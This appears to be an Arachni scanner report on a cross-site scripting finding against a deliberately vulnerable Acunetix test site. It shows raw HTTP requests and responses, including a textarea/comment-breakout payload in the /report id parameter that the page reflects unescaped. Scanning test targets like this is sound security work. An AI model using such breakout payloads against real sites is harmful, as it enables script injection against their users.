_arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
link
input
id
using
GET
at
http://testhtml5.vulnweb.com/
pointing to
http://testhtml5.vulnweb.com/report
.
0 1 2 3 4 | <a class="btn btn-mini" ng-href="/report?id=696a3680438a7af53a0a54d3d26469bf" href="/report?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="2002938079"> <i class="icon-warning-sign" title="Report"> </i> </a> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
link |
http://testhtml5.vulnweb.com/ | http://testhtml5.vulnweb.com/report |
|
|
http://testhtml5.vulnweb.com/report?id=696a3680438a7af53a0a54d3d26469bf%3C/textarea%3E--%3E%3Cxss_0c25785427908905790d3a663dc49fa7/%3E%3C!--%3Ctextarea%3E
Raw HTTP request used to retrieve the page.
GET /report?id=696a3680438a7af53a0a54d3d26469bf%3C%2Ftextarea%3E--%3E%3Cxss_0c25785427908905790d3a663dc49fa7%2F%3E%3C%21--%3Ctextarea%3E HTTP/1.1 Host: testhtml5.vulnweb.com Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: 0c25785427908905790d3a663dc49fa7
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:57:09 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->
<link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Action</li>
<li class="active"><a href="#/response">Response</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
Your report was submitted, thanks. <!-- 696a3680438a7af53a0a54d3d26469bf</textarea>--><xss_0c25785427908905790d3a663dc49fa7/><!--<textarea> -->
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p>© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>
<script src="/static/app/app.js"></script>
</body>
</html>
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 9.163898 | load |
page
|
|
||
| 1 | 3.86217 | request |
http://testhtml5.vulnweb.com/ |
|
||
| 2 | 3.554117 | request |
http://testhtml5.vulnweb.com/static/app/services/itemsService.js |
|
||
| 3 | 0.30496 | request |
http://testhtml5.vulnweb.com/ajax/popular?offset=0 |
|
||
| 4 | 0.812222 | request |
http://testhtml5.vulnweb.com/static/app/partials/itemsList.html |
|
||
| 5 | 0.570796 | request |
http://testhtml5.vulnweb.com/static/scr/default.png |
|
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,* Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:56:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 | <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="1909442962"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal" data-arachni-id="73596745">Login</a> </p> 